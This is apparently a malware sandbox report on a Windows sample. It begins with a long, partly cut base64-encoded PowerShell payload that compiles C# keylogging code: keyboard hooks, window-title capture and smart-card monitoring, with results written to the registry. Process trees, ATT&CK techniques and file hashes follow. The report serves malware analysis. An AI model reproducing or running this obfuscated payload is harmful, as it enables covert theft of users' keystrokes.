AWwBoADcAOABdAC4AbAAyADkAIAA9ACAAYgA4ADAAOwBoADcAOAArACsAOwB9AGkAZgAgACgAUwBDAGEAcgBkAEcAZQB0AFMAdABhAHQAdQBzAEMAaABhAG4AZwBlACgAawAyADcALAAgADUAMAAwACwAIABhADcAOQAsACAAYQA3ADkALgBMAGUAbgBnAHQAaAApACAAPQA9ACAAMAApAHsAZgBvAHIAIAAoAGkAbgB0ACAAcAA4ADEAIAA9ACAAMAA7ACAAcAA4ADEAIAA8ACAAZwA3ADcAOwAgAHAAOAAxACsAKwApAHsAaQA3ADMAIAA9ACAAYQA3ADkAWwBwADgAMQBdADsAaAA3ADIAIAArAD0AIABpADcAMwAuAGwAMgA5ADsAaQBmACAAKAAoAGkANwAzAC4AbAAzADIAIAAmACAAMAB4ADAAMAAwADAAMAAwADIAMAApACAAIQA9ACAAMAApACAAaAA3ADIAIAArAD0AIAAiACAALQAgAGYAbwB1AG4AZAAiADsAaAA3ADIAIAArAD0AIAAiAFwAcgBcAG4AIgA7AH0AfQB9AH0AfQBSAGUAZwBpAHMAdAByAHkALgBTAGUAdABWAGEAbAB1AGUAKABsADIAMAAsACAAbwAyADIALAAgAGgANwAyACkAOwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQALgBTAGwAZQBlAHAAKAAxADAAMAAwACkAOwB9AHIAZQB0AHUAcgBuACAAMAA7AH0AWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAUwBlAHQAVwBpAG4AZABvAHcAcwBIAG8AbwBrAEUAeAAoAGkAbgB0ACAAbAA4ADIALAAgAGoAMwAgAG4AOAAzACwAIABJAG4AdABQAHQAcgAgAGIAOAA0ACwAIAB1AGkAbgB0ACAAZgA4ADUAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABiAG8AbwBsACAAVQBuAGgAbwBvAGsAVwBpAG4AZABvAHcAcwBIAG8AbwBrAEUAeAAoAEkAbgB0AFAAdAByACAAYwA4ADYAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwATgBlAHgAdABIAG8AbwBrAEUAeAAoAEkAbgB0AFAAdAByACAAYwA4ADYALAAgAGkAbgB0ACAAZgA0ADgALAAgAEkAbgB0AFAAdAByACAAcAA0ADkALAAgAEkAbgB0AFAAdAByACAAaQA1ADAAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABHAGUAdABNAG8AZAB1AGwAZQBIAGEAbgBkAGwAZQAoAHMAdAByAGkAbgBnACAAYwA4ADcAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIAB1AGkAbgB0ACAATQBhAHAAVgBpAHIAdAB1AGEAbABLAGUAeQAoAGkAbgB0ACAAcAA4ADgALAAgAHUAaQBuAHQAIABqADgAOQApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHUAaQBuAHQAIABHAGUAdABLAGUAeQBiAG8AYQByAGQATABhAHkAbwB1AHQAKAB1AGkAbgB0ACAAbQA5ADAAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgAsACAAQwBoAGEAcgBTAGUAdAA9AEMAaABhAHIAUwBlAHQALgBBAHUAdABvACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAVABvAFUAbgBpAGMAbwBkAGUARQB4ACgAaQBuAHQAIABsADkAMQAsACAAdQBpAG4AdAAgAGYAOQAyACwAIABiAHkAdABlAFsAXQAgAG4AOQAzACwAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBTAHQAcgBpAG4AZwBCAHUAaQBsAGQAZQByACAAYQA5ADQALAAgAGkAbgB0ACAAYQA5ADUALAAgAHUAaQBuAHQAIABkADkANgAsACAAdQBpAG4AdAAgAG0AOQA3ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAYgBvAG8AbAAgAEcAZQB0AEsAZQB5AGIAbwBhAHIAZABTAHQAYQB0AGUAKABiAHkAdABlAFsAXQAgAGUAOQA4ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdQBpAG4AdAAgAEcAZQB0AEYAbwByAGUAZwByAG8AdQBuAGQAVwBpAG4AZABvAHcAKAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHUAaQBuAHQAIABHAGUAdABXAGkAbgBkAG8AdwBUAGgAcgBlAGEAZABQAHIAbwBjAGUAcwBzAEkAZAAoAHUAaQBuAHQAIABwADkAOQAsACAAcgBlAGYAIAB1AGkAbgB0ACAAYgAxADAAMAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAARwBlAHQAVwBpAG4AZABvAHcAVABlAHgAdABMAGUAbgBnAHQAaAAoAHUAaQBuAHQAIABvADEAMAAxACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdQBpAG4AdAAgAEcAZQB0AFcAaQBuAGQAbwB3AFQAZQB4AHQAKAB1AGkAbgB0ACAAbwAxADAAMQAsACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGEAMQAwADIALAAgAGkAbgB0ACAAbgAxADAAMwApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIAB1AGkAbgB0ACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGYAMQAwADQALAAgAHUAaQBuAHQAIABrADEAMAA1ACwAIABqADYAIABmADEAMAA2ACwAIABJAG4AdABQAHQAcgAgAGsAMQAwADcALAAgAHUAaQBuAHQAIABtADEAMAA4ACwAIABJAG4AdABQAHQAcgAgAGYAMQAwADkAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdgBvAGkAZAAgAEUAeABpAHQAUAByAG8AYwBlAHMAcwAoAHUAaQBuAHQAIABqADEAMQAwACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHUAaQBuAHQAIABDAHIAZQBhAHQAZQBNAHUAdABlAHgAKABJAG4AdABQAHQAcgAgAGwAMQAxADEALAAgAGIAbwBvAGwAIABmADEAMQAyACwAIABzAHQAcgBpAG4AZwAgAGwAMQAxADMAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdQBpAG4AdAAgAE8AcABlAG4ATQB1AHQAZQB4ACgAdQBpAG4AdAAgAGEAMQAxADQALAAgAGIAbwBvAGwAIABjADEAMQA1ACwAIABzAHQAcgBpAG4AZwAgAGwAMQAxADMAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAHcAaQBuAHMAYwBhAHIAZAAuAGQAbABsACIAKQBdAHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABTAEMAYQByAGQARQBzAHQAYQBiAGwAaQBzAGgAQwBvAG4AdABlAHgAdAAoAEkAbgB0ADMAMgAgAGEAMQAxADYALAAgAEkAbgB0AFAAdAByACAAbQAxADEANwAsACAASQBuAHQAUAB0AHIAIABvADEAMQA4ACwAIABvAHUAdAAgAEkAbgB0AFAAdAByACAAbAAxADEAOQApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdwBpAG4AcwBjAGEAcgBkAC4AZABsAGwAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAAgAD0AIAAiAFMAQwBhAHIAZABMAGkAcwB0AFIAZQBhAGQAZQByAHMAQQAiACwAIABDAGgAYQByAFMAZQB0ACAAPQAgAEMAaABhAHIAUwBlAHQALgBBAG4AcwBpACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAUwBDAGEAcgBkAEwAaQBzAHQAUgBlAGEAZABlAHIAcwAoAEkAbgB0AFAAdAByACAAbAAxADEAOQAsACAAYgB5AHQAZQBbAF0AIABvADEAMgAwACwAIABiAHkAdABlAFsAXQAgAGgAMQAyADEALAAgAG8AdQB0ACAAVQBJAG4AdAAzADIAIABmADEAMgAyACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB3AGkAbgBzAGMAYQByAGQALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAUwBDAGEAcgBkAEcAZQB0AFMAdABhAHQAdQBzAEMAaABhAG4AZwBlACgASQBuAHQAUAB0AHIAIABsADEAMQA5ACwAIABVAEkAbgB0ADMAMgAgAGoAMQAyADMALAAgAFsASQBuACwAIABPAHUAdABdACAAYgAyADgAWwBdACAAYQA3ADkALAAgAEkAbgB0ADMAMgAgAHAAMQAyADQAKQA7AH0AfQANAAoAIgBAACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMAOwBbAGoAMQAuAGQAMgBdADoAOgBSAHUAbgAoACAAewAgACQAbgB1AGwAbAAgAD0AIABbAGMAbwBuAHMAbwBsAGUAXQA6ADoAQwBhAHAAcwBMAG8AYwBrACAAfQAgACkA
1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:204
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\iryyw3ng\iryyw3ng.cmdline"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2112
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDE01.tmp" "c:\Users\Admin\AppData\Local\Temp\iryyw3ng\CSCD934975D58134BA09DE291A1B119B840.TMP"
    3⤵
    PID:5060

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\26355f790.js

Filesize
49KB

MD5
4d34ec02184da5616079c797ba57b086

SHA1
6f5be334aaeaac82636cd6231d3435b021a503f1

SHA256
50e94574a57fd1349ca9327886d01fe773fc787e7f8bef718ec88d50b5825391

SHA512
1eb6a0781dc0070f4376c17d07651e00b717a9df7dd9efb82fbc348a09749f3fb4f136f150626246c239ac8cf040cd3259d463b864a9cc6a1a41782416c4afb9

Download Submit
C:\Users\Admin\AppData\Local\Temp\2815614063.js

Filesize
49KB

MD5
4d34ec02184da5616079c797ba57b086

SHA1
6f5be334aaeaac82636cd6231d3435b021a503f1

SHA256
50e94574a57fd1349ca9327886d01fe773fc787e7f8bef718ec88d50b5825391

SHA512
1eb6a0781dc0070f4376c17d07651e00b717a9df7dd9efb82fbc348a09749f3fb4f136f150626246c239ac8cf040cd3259d463b864a9cc6a1a41782416c4afb9

Download Submit
C:\Users\Admin\AppData\Local\Temp\852621949

Filesize
40KB

MD5
21432c9e8159fef9ddf6ddadb907a88b

SHA1
cac9514235c1f2d4c871159b94bf069fafe1645f

SHA256
73a1b061676d2a58ae5bc11ccc129d9f8ad432db87793b0314d885ccaa6dd961

SHA512
46417954ec9573fc19b220021c2b497befbe2e5f452628c7199f57e97c0110d8acc818ba76bb8b78211e8b8baffd86e12ac224ad59223c2cacaeacca3e141b7f

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESDE01.tmp

Filesize
1KB

MD5
9a5a5957852184cae3d0ecf8d0d8e78e

SHA1
c2042043fe3ee2af10ee47f27e34cf4e3c45a2ce

SHA256
06a26579368c6406f40003ba44f8b428f4349e0887ae0138cc69b1dc6b2e6a4d

SHA512
f5c40d2a1e28cfb6a8ac54568eca186557fa8f7d2bf0dcc3250d895c27582c60e681c82824e8b30f819ee7b012da6e20b0f693f51d068c738b8d3b1560b1341e

Download Submit
C:\Users\Admin\AppData\Local\Temp\iryyw3ng\iryyw3ng.dll

Filesize
9KB

MD5
d68155a51ad702a683298f54f4449b4b

SHA1
3a635c68eef428ee855c4833584e8d3ca9b087c2

SHA256
b4f27629a43bb9c216942925bfac2a61f8656ea4849318e00ef6bf3c8906b554

SHA512
3772ffede3d283e741d44d6c53b2a5a388f3f5f31b4abac62a8838ded7ab425e980177f803bf61286e80cb39440e7f59163089a7579f890f0fb26883c11ecea3

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\iryyw3ng\CSCD934975D58134BA09DE291A1B119B840.TMP

Filesize
652B

MD5
95f0b2118378559284dee5ed793dc802

SHA1
1aba398e9ccb632d0a723d802523ef7f4ff5a560

SHA256
255b4c10946c3d51ccff601b09c126c61866de9830139503862d46ae4d281195

SHA512
d8e4b33eeb784de8b03156865bb9d86e4dd2a85b33966d869d75d20cc86765f4734a69782b7cd590974735f6eb6eaa1d66775461f5955e942416f9d2fc64aa29

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\iryyw3ng\iryyw3ng.0.cs

Filesize
7KB

MD5
0ea0f042848fe6be56f2ac10f576eac9

SHA1
10581024d7621131ce2b61b66b2d0e62e6c154ac

SHA256
e1bac97a2157df3d35e1a7e6acb0b646682b9a13858d86d3b13027492b56b6e5

SHA512
d98c67e4e79769026fd710e9bb448db0f929167673358757dca3c493c8df7476d18b08a530aa578039db7a66dbbc33e174f706d2e0c30990c67b4add85156ce2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\iryyw3ng\iryyw3ng.cmdline

Filesize
494B

MD5
0a7d82a21e7b8dead39c02baf36e4612

SHA1
cdd9d0786b699f9cf06254cf5643740d2f54f351

SHA256
97581feb327b2d91fe4bb341fc3f24506fa82deb5354af5e1c9f495103cfd13c

SHA512
73a87c2a14f3f07afad84426b19eb1d62adc79ec35cf31be97015ef8a2eb4bb61bee31e119126e3b5479c5372d82aeb9637af1ea35cb1804ff27a6ac16a1b5aa

Download Submit
memory/204-140-0x00007FFEB0610000-0x00007FFEB10D1000-memory.dmp

Filesize
10.8MB

Download
memory/204-136-0x0000024CD70C0000-0x0000024CD70E2000-memory.dmp

Filesize
136KB

Download
memory/204-145-0x00007FFEB0610000-0x00007FFEB10D1000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing